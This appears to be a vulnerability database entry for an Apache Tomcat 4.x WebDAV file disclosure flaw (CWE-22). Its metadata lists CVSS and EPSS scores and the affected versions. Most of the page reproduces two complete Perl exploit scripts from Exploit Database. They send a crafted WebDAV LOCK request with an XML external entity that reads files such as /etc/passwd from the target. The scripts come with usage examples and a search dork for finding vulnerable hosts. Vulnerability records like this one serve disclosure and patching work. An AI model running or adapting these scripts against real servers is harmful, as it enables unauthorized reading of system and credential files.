Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-22 |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
3.5 |
|
AV:N/AC:M/Au:S/C:P/I:N/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4552
Publication date : 2007-10-20 22h00 +00:00
Author : h3rcul3s
EDB Verified : Yes
#!/usr/bin/perl
#================================================================
# Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL
# MoDiFiEd version by : h3rcul3s
# ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530
# MoDiFiCaTiOn : This code is useble against targets over SSL
# Prerequisites : A valid login credentials, webdav
# DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat
# Potential targets : similar to https://www.somehost.com:8443
#================================================================
# THaNkS To eliteb0y, the whole team AnD "perlmonks".
# This piece of code is written ONLY for educational purpose.
# Use it at your own risk.
# No author will be responsible for any damage.
#================================================================
# -------------------------[C O D E]-----------------------------
#================================================================
use LWP::Protocol::https;
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE--------------------------------------------
$remoteport = 8443;
sub usage {
print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "\n\n";
print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n";
print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n";
print "\n\n";
print "USAGE :\nperl TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n";
print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n";
print "\n";
print "Launching Remote Exploit over SSL...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
# milw0rm.com [2007-10-21]
Exploit Database EDB-ID : 4530
Publication date : 2007-10-13 22h00 +00:00
Author : eliteboy
EDB Verified : Yes
#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE
$remoteport = 8080;
sub usage {
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n";
print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
# milw0rm.com [2007-10-14]
Products Mentioned
Configuraton 0
Apache>>Tomcat >> Version 4.0.0
Apache>>Tomcat >> Version 4.0.1
Apache>>Tomcat >> Version 4.0.2
Apache>>Tomcat >> Version 4.0.3
Apache>>Tomcat >> Version 4.0.4
Apache>>Tomcat >> Version 4.0.5
Apache>>Tomcat >> Version 4.0.6
Apache>>Tomcat >> Version 4.1.0
Apache>>Tomcat >> Version 4.1.1
Apache>>Tomcat >> Version 4.1.2
Apache>>Tomcat >> Version 4.1.3
Apache>>Tomcat >> Version 4.1.4
Apache>>Tomcat >> Version 4.1.5
Apache>>Tomcat >> Version 4.1.6
Apache>>Tomcat >> Version 4.1.7
Apache>>Tomcat >> Version 4.1.8
Apache>>Tomcat >> Version 4.1.9
Apache>>Tomcat >> Version 4.1.10
Apache>>Tomcat >> Version 4.1.11
Apache>>Tomcat >> Version 4.1.12
Apache>>Tomcat >> Version 4.1.13
Apache>>Tomcat >> Version 4.1.14
Apache>>Tomcat >> Version 4.1.15
Apache>>Tomcat >> Version 4.1.16
Apache>>Tomcat >> Version 4.1.17
Apache>>Tomcat >> Version 4.1.18
Apache>>Tomcat >> Version 4.1.19
Apache>>Tomcat >> Version 4.1.20
Apache>>Tomcat >> Version 4.1.21
Apache>>Tomcat >> Version 4.1.22
Apache>>Tomcat >> Version 4.1.23
Apache>>Tomcat >> Version 4.1.24
Apache>>Tomcat >> Version 4.1.25
Apache>>Tomcat >> Version 4.1.26
Apache>>Tomcat >> Version 4.1.27
Apache>>Tomcat >> Version 4.1.28
Apache>>Tomcat >> Version 4.1.29
Apache>>Tomcat >> Version 4.1.30
Apache>>Tomcat >> Version 4.1.31
Apache>>Tomcat >> Version 4.1.32
Apache>>Tomcat >> Version 4.1.33
Apache>>Tomcat >> Version 4.1.34
Apache>>Tomcat >> Version 4.1.35
Apache>>Tomcat >> Version 4.1.36
References